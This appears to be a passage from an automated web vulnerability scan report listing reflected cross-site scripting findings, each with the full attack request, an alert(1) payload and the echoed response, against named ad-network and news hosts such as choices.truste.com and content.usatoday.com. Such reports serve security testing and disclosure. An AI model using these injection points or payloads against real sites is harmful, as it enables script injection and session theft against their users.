GET /2/ZapTrader/ATT/Wired/Pros-Legacyaee35"><script>alert(1)</script>dbb7e18ef46/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; Dominos=247B3; RMFL=011QD4ETU107OI|U107OK; PizzaHut=ZapTrader; RMFM=011QGuZMJ10CWN|U10CXL; NXCLICK2=011QGuZMNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_TE_ALL/1x1/11304348270.6228!y!B3!CXL!EVT; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:39 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 393
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/ATT/Wired/Pros-Legacyaee35"><script>alert(1)</script>dbb7e18ef46/All/14a155dda-808a-4648-a03d-f65de2ef0ada/1351597883/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

2.51. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46703"><script>alert(1)</script>3613c51ffe3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/ATT/Wired/Pros-Legacy/All46703"><script>alert(1)</script>3613c51ffe3/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; Dominos=247B3; RMFL=011QD4ETU107OI|U107OK; PizzaHut=ZapTrader; RMFM=011QGuZMJ10CWN|U10CXL; NXCLICK2=011QGuZMNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_TE_ALL/1x1/11304348270.6228!y!B3!CXL!EVT; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:41 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 392
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5345525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/ATT/Wired/Pros-Legacy/All46703"><script>alert(1)</script>3613c51ffe3/14a155dda-808a-4648-a03d-f65de2ef0ada/187855159/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

2.52. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b088e"><script>alert(1)</script>c4e352e43c0 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90b088e"><script>alert(1)</script>c4e352e43c0 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; Dominos=247B3; RMFL=011QD4ETU107OI|U107OK; PizzaHut=ZapTrader; RMFM=011QGuZMJ10CWN|U10CXL; NXCLICK2=011QGuZMNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_TE_ALL/1x1/11304348270.6228!y!B3!CXL!EVT; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:43 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 384
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada/681954732/x90b088e"><script>alert(1)</script>c4e352e43c0/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

2.53. http://choices.truste.com/ca [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 8380f<script>alert(1)</script>6e68ad76aa0 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont38380f<script>alert(1)</script>6e68ad76aa0&w=728&h=90&ox=20&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286737327/direct;wi.728;hi.90/014a155dda-808a-4648-a03d-f65de2ef0ada?click=http%3A%2F%2Ftracker-clk.bidder7.mookie1.com%2Ftr-clk%3Fa%3D4a155dda-808a-4648-a03d-f65de2ef0ada%26b%3D1%26c%3D10000205%26x%3Drtbbid2us2%26url%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:04 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4521

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
baseName] = bindings;
   }
}

   // prototypes
   String.prototype.equalsIgnoreCase = function(arg) {
       return (new String(this.toLowerCase()) == (new String(arg)).toLowerCase());
   }

   var te_clr1_att02cont38380f<script>alert(1)</script>6e68ad76aa0_ib = '<div id="te-clr1-att02cont38380f<script>
...[SNIP]...

2.54. http://choices.truste.com/ca [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the h request parameter is copied into the HTML document as plain text between tags. The payload 494f6<script>alert(1)</script>1666fb1c095 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90494f6<script>alert(1)</script>1666fb1c095&ox=20&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286737327/direct;wi.728;hi.90/014a155dda-808a-4648-a03d-f65de2ef0ada?click=http%3A%2F%2Ftracker-clk.bidder7.mookie1.com%2Ftr-clk%3Fa%3D4a155dda-808a-4648-a03d-f65de2ef0ada%26b%3D1%26c%3D10000205%26x%3Drtbbid2us2%26url%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:05 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4121

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div> \
\
';

   var te_clr1_att02cont3_bi = {'baseName':'te-clr1-att02cont3','anchName':'te-clr1-att02cont3-anch','width':728,'height':90494f6<script>alert(1)</script>1666fb1c095,'ox':20,'oy':0,'plc':'tr','iplc':'ctr','intDivName':'te-clr1-att02cont3-itl','iconSpanId':'te-clr1-att02cont3-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId':'att02cont3'
...[SNIP]...

2.55. http://choices.truste.com/ca [iplc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the iplc request parameter is copied into the HTML document as plain text between tags. The payload 15721<script>alert(1)</script>2a12d89ce41 was submitted in the iplc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90&ox=20&zi=10002&plc=tr&iplc=ctr15721<script>alert(1)</script>2a12d89ce41 HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286737327/direct;wi.728;hi.90/014a155dda-808a-4648-a03d-f65de2ef0ada?click=http%3A%2F%2Ftracker-clk.bidder7.mookie1.com%2Ftr-clk%3Fa%3D4a155dda-808a-4648-a03d-f65de2ef0ada%26b%3D1%26c%3D10000205%26x%3Drtbbid2us2%26url%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:05 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4029

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div>\
';

   var te_clr1_att02cont3_bi = {'baseName':'te-clr1-att02cont3','anchName':'te-clr1-att02cont3-anch','width':728,'height':90,'ox':20,'oy':0,'plc':'tr','iplc':'ctr15721<script>alert(1)</script>2a12d89ce41','intDivName':'te-clr1-att02cont3-itl','iconSpanId':'te-clr1-att02cont3-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId':'att02cont3','noticeBaseUrl':'http://choices.trust
...[SNIP]...

2.56. http://choices.truste.com/ca [ox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the ox request parameter is copied into the HTML document as plain text between tags. The payload 125a2<script>alert(1)</script>e1a6fd9e849 was submitted in the ox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90&ox=20125a2<script>alert(1)</script>e1a6fd9e849&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286737327/direct;wi.728;hi.90/014a155dda-808a-4648-a03d-f65de2ef0ada?click=http%3A%2F%2Ftracker-clk.bidder7.mookie1.com%2Ftr-clk%3Fa%3D4a155dda-808a-4648-a03d-f65de2ef0ada%26b%3D1%26c%3D10000205%26x%3Drtbbid2us2%26url%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:05 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4029

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div>\
';

   var te_clr1_att02cont3_bi = {'baseName':'te-clr1-att02cont3','anchName':'te-clr1-att02cont3-anch','width':728,'height':90,'ox':20125a2<script>alert(1)</script>e1a6fd9e849,'oy':0,'plc':'tr','iplc':'ctr','intDivName':'te-clr1-att02cont3-itl','iconSpanId':'te-clr1-att02cont3-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId':'att02cont3','notice
...[SNIP]...

2.57. http://choices.truste.com/ca [plc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the plc request parameter is copied into the HTML document as plain text between tags. The payload 119da<script>alert(1)</script>1f53089f8a1 was submitted in the plc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90&ox=20&zi=10002&plc=tr119da<script>alert(1)</script>1f53089f8a1&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286737327/direct;wi.728;hi.90/014a155dda-808a-4648-a03d-f65de2ef0ada?click=http%3A%2F%2Ftracker-clk.bidder7.mookie1.com%2Ftr-clk%3Fa%3D4a155dda-808a-4648-a03d-f65de2ef0ada%26b%3D1%26c%3D10000205%26x%3Drtbbid2us2%26url%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:05 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4029

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div>\
';

   var te_clr1_att02cont3_bi = {'baseName':'te-clr1-att02cont3','anchName':'te-clr1-att02cont3-anch','width':728,'height':90,'ox':20,'oy':0,'plc':'tr119da<script>alert(1)</script>1f53089f8a1','iplc':'ctr','intDivName':'te-clr1-att02cont3-itl','iconSpanId':'te-clr1-att02cont3-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId':'att02cont3','noticeBaseUrl':'http://
...[SNIP]...

2.58. http://choices.truste.com/ca [w parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the w request parameter is copied into the HTML document as plain text between tags. The payload 759b0<script>alert(1)</script>4cc70211f6 was submitted in the w parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728759b0<script>alert(1)</script>4cc70211f6&h=90&ox=20&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286737327/direct;wi.728;hi.90/014a155dda-808a-4648-a03d-f65de2ef0ada?click=http%3A%2F%2Ftracker-clk.bidder7.mookie1.com%2Ftr-clk%3Fa%3D4a155dda-808a-4648-a03d-f65de2ef0ada%26b%3D1%26c%3D10000205%26x%3Drtbbid2us2%26url%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:05 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4120

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div> \
\
';

   var te_clr1_att02cont3_bi = {'baseName':'te-clr1-att02cont3','anchName':'te-clr1-att02cont3-anch','width':728759b0<script>alert(1)</script>4cc70211f6,'height':90,'ox':20,'oy':0,'plc':'tr','iplc':'ctr','intDivName':'te-clr1-att02cont3-itl','iconSpanId':'te-clr1-att02cont3-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId':
...[SNIP]...

2.59. http://choices.truste.com/ca [zi parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the zi request parameter is copied into the HTML document as plain text between tags. The payload 757cf<script>alert(1)</script>9c81586b66e was submitted in the zi parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90&ox=20&zi=10002757cf<script>alert(1)</script>9c81586b66e&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286737327/direct;wi.728;hi.90/014a155dda-808a-4648-a03d-f65de2ef0ada?click=http%3A%2F%2Ftracker-clk.bidder7.mookie1.com%2Ftr-clk%3Fa%3D4a155dda-808a-4648-a03d-f65de2ef0ada%26b%3D1%26c%3D10000205%26x%3Drtbbid2us2%26url%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:05 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4029

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
overlay(te_clr1_att02cont3_bi)','icon':'http://choices.truste.com/assets/admarker.png','icon_cam':'http://choices.truste.com/assets/adicon.png','iconText':'','aid':'att02','pid':'mec01','zindex':'10002757cf<script>alert(1)</script>9c81586b66e','cam':'2'};

   var tecabaseurl = 'choices.truste.com';

   truste.ca.addEvent(window, 'load', function() {
       if(!truste.defjsload) {
           var element = document.createElement('script');
           element.src = '
...[SNIP]...

2.60. http://content.usatoday.com/apps/insidepage/crc.ashx [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usatoday.com
Path:   /apps/insidepage/crc.ashx

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 98134<script>alert(1)</script>2d20feb71dc was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /apps/insidepage/crc.ashx?callback=commentcount98134<script>alert(1)</script>2d20feb71dc&articleId=46732364.story HTTP/1.1
Host: content.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; SiteLifeHost=gnvm3l3pluckcom; s_ppv=24

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/json; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 09 May 2011 15:38:56 GMT
Content-Length: 132

commentcount98134<script>alert(1)</script>2d20feb71dc({"articleId": "46732364.story","commentCount": "137","recommendCount": "11"});

2.61. http://d7.zedo.com/bar/v16-406/d3/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-406/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac370'%3balert(1)//316d65e6609 was submitted in the $ parameter. This input was echoed as ac370';alert(1)//316d65e6609 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-406/d3/jsc/fm.js?c=2/1&a=0&f=&n=1099&r=13&d=9&q=&$=ac370'%3balert(1)//316d65e6609&s=1&l=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b02/f/180/%252a/k%253B230856172%253B0-0%253B0%253B54838158%253B4307-300/250%253B38780865/38798622/1%253B%253B%257Eaopt%253D6/0/ff/1%253B%257Esscs%253D%253fhttp%3A//adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBqcIQ3QnITYHLMdHzlAfkkdilD9mI4PMBAAAAEAEgjfDlBTgAWMG1jcYbYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEEmAKIJ8ACAuACAOoCDjMwMHgyNTBBX01vbmV5-ALw0R6QA6QDmAPgA6gDAeAEAQ%2526num%253D0%2526sig%253DAGiWqtzUGb2mvqDPCSfB7Czyb06Trd9-Zg%2526client%253Dca-pub-6743622525202572%2526adurl%253Dhttp%253a%252f%252fwww.csmonitor.com/&z=0.16775888670235872 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFCap=1581B1219,212244|0,1,1; __qca=P0-591305981-1304358415303; PI=h749620Za805982Zc305002744%2C305002744Zs263Zt1122; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1099:ac370';alert(1)//316d65e6609;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1099,2,9;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1589B1099,2#702968|0,1,1;expires=Wed, 08 Jun 2011 15:36:11 GMT;path=/;domain=.zedo.com;
ETag: "ae1b52-8181-4a207a1458040"
Vary: Accept-Encoding
X-Varnish: 1332201874 1332193309
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=158
Expires: Mon, 09 May 2011 15:38:49 GMT
Date: Mon, 09 May 2011 15:36:11 GMT
Connection: close
Content-Length: 2055

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',ac370';alert(1)//316d65e6609';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
